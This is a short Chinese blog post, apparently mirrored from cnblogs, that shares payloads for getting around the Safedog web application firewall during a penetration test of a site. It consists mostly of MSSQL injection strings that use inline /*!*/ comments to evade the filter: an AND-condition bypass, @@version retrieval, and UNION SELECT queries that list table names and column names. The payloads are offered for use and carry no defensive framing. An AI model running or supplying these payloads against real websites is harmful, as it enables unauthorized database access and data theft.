zoukankan      html  css  js  c++  java
  • Bapass 安全狗

    写于2018年10月

    最近渗透某个站点遇到了狗,经过千辛万苦总算绕过了,在这里分享一下过狗payload

    绕过的主要方法还是加/*!*/

    这里我主要以mssql注入做测试

    绕and

    and /*!*/1=2/*!*/

    这里面我用db_name/*!*/()绕过函数

    绕全局变量

    /*!'*/@@version/*!'*/

    查表

    union  /*!x*//*!y*/select top 1 1,name,3  /*!x*//*!y*/from admin.dbo. sysobjects where xtype=0x55 and  name not in(cast(0x6e6577 as char)      )

    查字段

    union /*!x*//*!y*/select top 1 1,column_name,3 /*!y*//*!x*/from   /*!'*/information_schema.columns/*!'*/ where table_name=’user’ and  column_name not in(select top 2 column_name /*!y*//*!x*/from   /*!'*/information_schema.columns/*!'*/ )

  • 相关阅读:
    fastlane
    OSI 模型
    iOS面试—0、技术点
    Git 提交规范
    iOS Aggregate 合并静态库
    iOS 应用分发平台
    json 转swift的工具
    敏捷开发
    mac 打包dmg
    iOS 获取素材
  • 原文地址:https://www.cnblogs.com/supdon/p/13469746.html
Copyright © 2011-2022 走看看